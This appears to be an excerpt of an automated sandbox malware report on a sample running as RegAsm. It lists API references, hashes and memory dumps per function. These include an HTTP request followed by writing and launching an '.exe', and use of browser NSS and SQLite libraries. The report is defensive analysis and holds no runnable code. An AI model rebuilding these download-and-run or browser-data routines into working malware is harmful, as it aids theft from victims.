Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: Alloc_Util$Valuefreemallocmemcpy
String ID:
API String ID: 2335489644-0
Opcode ID: 0b5e46b29ae5c18d7caa5f75cb40ea0e9b6f374a4cb6bab2aa1bd8ac94cffdc9
Instruction ID: a08128e8720abc20407e47b22f7ecc469b35a8def8a9d9dde777ee85b70d19c3
Opcode Fuzzy Hash: 0b5e46b29ae5c18d7caa5f75cb40ea0e9b6f374a4cb6bab2aa1bd8ac94cffdc9
Instruction Fuzzy Hash: 80F0FCF16032435BEB005F55DC81917BB98EF5529DB148138EE198BB05E721D855C7E1

Function 00410CC0 Relevance: 6.0, APIs: 4, Instructions: 39memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,Version: ,004365B6,?,?,?), ref: 00410CD8
HeapAlloc.KERNEL32(00000000), ref: 00410CDF
GetLocalTime.KERNEL32(?), ref: 00410CEB
wsprintfA.USER32 ref: 00410D16

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocLocalProcessTimewsprintf
String ID:
API String ID: 1243822799-0
Opcode ID: c7062ee0803dc682f4bd22a1f6830d1074b171fc43ac1dbb61c851727eb39e82
Instruction ID: 3361d4878da1eea6239f97e2bf75980f5f1ac49a34b78f17876420eca4585326
Opcode Fuzzy Hash: c7062ee0803dc682f4bd22a1f6830d1074b171fc43ac1dbb61c851727eb39e82
Instruction Fuzzy Hash: 4DF031B1900218BBDF14DFE59C059BF77BDAB0C616F001095F941E2180E6399A80D775

Function 00412166 Relevance: 6.0, APIs: 4, Instructions: 34fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00414FAC,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,00414FAC,?), ref: 00412181
GetFileSizeEx.KERNEL32(00000000,00414FAC,?,?,?,00414FAC,?), ref: 00412199
CloseHandle.KERNEL32(00000000,?,?,?,00414FAC,?), ref: 004121A4
CloseHandle.KERNEL32(00000000,?,?,?,00414FAC,?), ref: 004121AC

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseFileHandle$CreateSize
String ID:
API String ID: 4148174661-0
Opcode ID: 7686551e53b7644eb34baed25e55cd4cc7a7d590d99c042858ac62be5e4dc265
Instruction ID: 87089636491fbed30b1748ff62e0772d8b8c37abbef2c6f1f22f5f972430845f
Opcode Fuzzy Hash: 7686551e53b7644eb34baed25e55cd4cc7a7d590d99c042858ac62be5e4dc265
Instruction Fuzzy Hash: 29F0A731641314FBFB14D7A0DD09FDA7AADEB08761F200250FE01E61D0D7B06F818669

Function 6CB4CC50 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(?), ref: 6CB4CC61
free.MOZGLUE ref: 6CB4CC6E
DeleteCriticalSection.KERNEL32(?), ref: 6CB4CC80
free.MOZGLUE(?), ref: 6CB4CC87

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: CriticalDeleteSectionfree
String ID:
API String ID: 2988086103-0
Opcode ID: 6ba197d2191659e0609a1a585a905b415ff996b2e22aaa6b784665b68dcb5666
Instruction ID: 57abeb9f6824897e70af0ecaac42e53ac53f03dadb6ccb150cef4d8795223d45
Opcode Fuzzy Hash: 6ba197d2191659e0609a1a585a905b415ff996b2e22aaa6b784665b68dcb5666
Instruction Fuzzy Hash: C4E065B67016089FCA10EFA8DC84C8777BCEE4E6703150625E691C3700D235F905CBE1

Function 6CA29DC0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 220COMMON

Download Yara Rule

APIs

sqlite3_value_text.NSS3 ref: 6CA29E1F

Part of subcall function 6C9E13C0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,6C9B2352,?,00000000,?,?), ref: 6C9E1413
Part of subcall function 6C9E13C0: memcpy.VCRUNTIME140(00000000,6C9B2352,00000002,?,?,?,?,6C9B2352,?,00000000,?,?), ref: 6C9E14C0

Strings

LIKE or GLOB pattern too complex, xrefs: 6CA2A006
ESCAPE expression must be a single character, xrefs: 6CA29F78

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: memcpysqlite3_value_textstrlen
String ID: ESCAPE expression must be a single character$LIKE or GLOB pattern too complex
API String ID: 2453365862-264706735
Opcode ID: fdff64113e3c770fff6cae75a06d635b537887f74a0e7c8b90bd415de3cb6aa9
Instruction ID: 91ef6b23c23c96940e1084b1de9a582757579eb1903bf0ec8ae5a5b994bc9e77
Opcode Fuzzy Hash: fdff64113e3c770fff6cae75a06d635b537887f74a0e7c8b90bd415de3cb6aa9
Instruction Fuzzy Hash: CE811A70A043714BD750CF39C2903AAB7F2AF45718F2C8659D8A89BB85D739D8C6C791

Function 00412BF0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 124processCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00405237: GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040527E
Part of subcall function 00405237: RtlAllocateHeap.NTDLL(00000000), ref: 00405285
Part of subcall function 00405237: InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 004052A7
Part of subcall function 00405237: StrCmpCA.SHLWAPI(?), ref: 004052C1
Part of subcall function 00405237: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004052F1
Part of subcall function 00405237: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00405330
Part of subcall function 00405237: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405360
Part of subcall function 00405237: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040536B

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 00412446: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00414A8D), ref: 00412460

_memset.LIBCMT ref: 00412CDF
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00436710), ref: 00412D31

Strings

.exe, xrefs: 00412C3C

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$Internet$CreateHeapHttpOpenProcessRequestlstrcat$AllocateConnectFileOptionSendSystemTime_memsetlstrlen
String ID: .exe
API String ID: 2831197775-4119554291
Opcode ID: dca4419b34fce0c28ab30abb3e60bf27d84a7dc54cda20d1bfd4b76e486b6db5
Instruction ID: b22801d522c47b455a3bf9a13fec4127fa4a3e5ad37381d5e28ead6c554ce160
Opcode Fuzzy Hash: dca4419b34fce0c28ab30abb3e60bf27d84a7dc54cda20d1bfd4b76e486b6db5
Instruction Fuzzy Hash: 87418472E00109BBDF11FBA6ED42ACE7375AF44308F110076F500B7191D6B86E8A8BD9

Function 6CA84D10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE001,00000000), ref: 6CA84D57
PR_snprintf.NSS3(?,00000008,%d.%d,?,?), ref: 6CA84DE6

Strings

%d.%d, xrefs: 6CA84DDE

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: ErrorR_snprintf
String ID: %d.%d
API String ID: 2298970422-3954714993
Opcode ID: 252c61e371f53e3b502ed02b9c650e5cc2906e9ee354e485cbb3b90bc3b496a3
Instruction ID: 6aa938c23ffb128e58dc0c19e442fd5c3672cc8b9afdb1e287f7b53e8e95cff6
Opcode Fuzzy Hash: 252c61e371f53e3b502ed02b9c650e5cc2906e9ee354e485cbb3b90bc3b496a3
Instruction Fuzzy Hash: EB31E8B2D052586BEB109BB19C15BFF777CEF41308F050469ED159BB82EB309989CBA1

Function 0040F093 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040F0D6
_memmove.LIBCMT ref: 0040F104

Strings

string too long, xrefs: 0040F0D1

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Xinvalid_argument_memmovestd::_
String ID: string too long
API String ID: 256744135-2556327735
Opcode ID: 8a227626b72f4056b64c0a26e4177402fb02d15917d8bca6e61607cae78b5d0a
Instruction ID: 7a0806fae085cf6787416122fb97cfb1012f07200118ac727d966ddb9d8bf46f
Opcode Fuzzy Hash: 8a227626b72f4056b64c0a26e4177402fb02d15917d8bca6e61607cae78b5d0a
Instruction Fuzzy Hash: D211E371300201AFDB24DE2DD840929B369FF85354714013FF801ABBC2C779EC59C2AA

Function 00411ECF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00411EF9

Strings

image/jpeg, xrefs: 00411F21

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: malloc
String ID: image/jpeg
API String ID: 2803490479-3785015651
Opcode ID: 6b72b0d373d1163626baf5e7838df7277c332a4d567d67e2b356543416a513d9
Instruction ID: 1c9963d8e1bd3712552ddde0994ffc3eb950a7432bc1cc1e62e4a2615aecff81
Opcode Fuzzy Hash: 6b72b0d373d1163626baf5e7838df7277c332a4d567d67e2b356543416a513d9
Instruction Fuzzy Hash: 5A11A572910108FFCB10CFA5CD848DEBB7AFE05361B21026BEA11A21A0D7769E81DA54

Function 0040F128 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040F13E

Part of subcall function 0042EC45: std::exception::exception.LIBCMT ref: 0042EC5A
Part of subcall function 0042EC45: __CxxThrowException@8.LIBCMT ref: 0042EC6F
Part of subcall function 0042EC45: std::exception::exception.LIBCMT ref: 0042EC80

Part of subcall function 0040F238: std::_Xinvalid_argument.LIBCPMT ref: 0040F242

_memmove.LIBCMT ref: 0040F190

Strings

invalid string position, xrefs: 0040F139

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
String ID: invalid string position
API String ID: 3404309857-1799206989
Opcode ID: 91242230ce68a24c4f38e49356161a9258fe8054196df98927784ca714c59dc8
Instruction ID: e23b5eb9a1e42f9e221b8677ce3c7703de2c6ddbdd5f367577b3bfe0c378d6ff
Opcode Fuzzy Hash: 91242230ce68a24c4f38e49356161a9258fe8054196df98927784ca714c59dc8
Instruction Fuzzy Hash: 0111E131304210DBDB24DE6DD88095973A6AF55324754063BF815EFAC2C33CED49879A

Function 0040F34D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040F35C

Part of subcall function 0042EC45: std::exception::exception.LIBCMT ref: 0042EC5A
Part of subcall function 0042EC45: __CxxThrowException@8.LIBCMT ref: 0042EC6F
Part of subcall function 0042EC45: std::exception::exception.LIBCMT ref: 0042EC80

memmove.MSVCRT(0040EEBE,0040EEBE,C6C68B00,0040EEBE,0040EEBE,0040F15F,?,?,?,0040F1DF,?,?,?,771B0440,?,-00000001), ref: 0040F392

Strings

invalid string position, xrefs: 0040F357

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentmemmovestd::_
String ID: invalid string position
API String ID: 1659287814-1799206989
Opcode ID: 348d0c2b69c2b191df159d42681712194dc71b74dbe289b0b6df523c31963809
Instruction ID: a91313bf5449129972d3e0b6c61bf396901b99abf7d864de5386db584678c47f
Opcode Fuzzy Hash: 348d0c2b69c2b191df159d42681712194dc71b74dbe289b0b6df523c31963809
Instruction Fuzzy Hash: 6F01AD713007018BD7348E7989C491FB2E2EB85B21734493ED882D7B85DB7CE84E8398

Function 004281CD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45stringCOMMONLIBRARYCODE

Download Yara Rule

APIs

strcpy_s.MSVCRT ref: 004281DE
__invoke_watson.LIBCMT ref: 00428232

Part of subcall function 0042806D: _strcat_s.LIBCMT ref: 0042808C

Strings

,NC, xrefs: 0042821D

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: __invoke_watson_strcat_sstrcpy_s
String ID: ,NC
API String ID: 1132195725-1329140791
Opcode ID: 731b6ac6b642e3e8e5147aea8b100b6241764734f43c48f2503a638a59afb5d8
Instruction ID: 7263c20261f1d33d4cce58c4812a6ccf3018c0f2168d81fa3d23ea862a0e3966
Opcode Fuzzy Hash: 731b6ac6b642e3e8e5147aea8b100b6241764734f43c48f2503a638a59afb5d8
Instruction Fuzzy Hash: A0F0C872641228BFDB116A91EC02EDB3F59EF04350F854066F91955111DA36AD54C764

Function 0041F3BB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON

Download Yara Rule

APIs

DName::DName.LIBCMT ref: 0041F3F0
DName::DName.LIBCMT ref: 0041F3FC

Strings

{flat}, xrefs: 0041F3EB

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: NameName::
String ID: {flat}
API String ID: 1333004437-2606204563
Opcode ID: c0aecf38d8767bf2edb4203e1a237864f4bfc1262168b0dc7fac00c370597be1
Instruction ID: da75913b68d6d07b0bcc9ceeb751d75e82138ebb165cf24839429cfec7228cb0
Opcode Fuzzy Hash: c0aecf38d8767bf2edb4203e1a237864f4bfc1262168b0dc7fac00c370597be1
Instruction Fuzzy Hash: 75F08535244208AFCB11EF59D445AE43BA0AF8575AF08808AF9484F293C774E882CB99

Function 0040141E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00401436
GlobalMemoryStatusEx.KERNEL32(?), ref: 00401449

Strings

@, xrefs: 00401442

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: GlobalMemoryStatus_memset
String ID: @
API String ID: 587104284-2766056989
Opcode ID: ea78773fa3532b546fc2bed9ec4844f5fa5bd431fc3f66efb89effc32c35708b
Instruction ID: 109ca1747397a3c99a2e715ad0f668a42f12933073e5ea0efda9a81ab0e3fd91
Opcode Fuzzy Hash: ea78773fa3532b546fc2bed9ec4844f5fa5bd431fc3f66efb89effc32c35708b
Instruction Fuzzy Hash: 7BE0B8F1D002089BDB54DFA5ED46B5D77F89B08708F5000299A05F7181D674AA099659

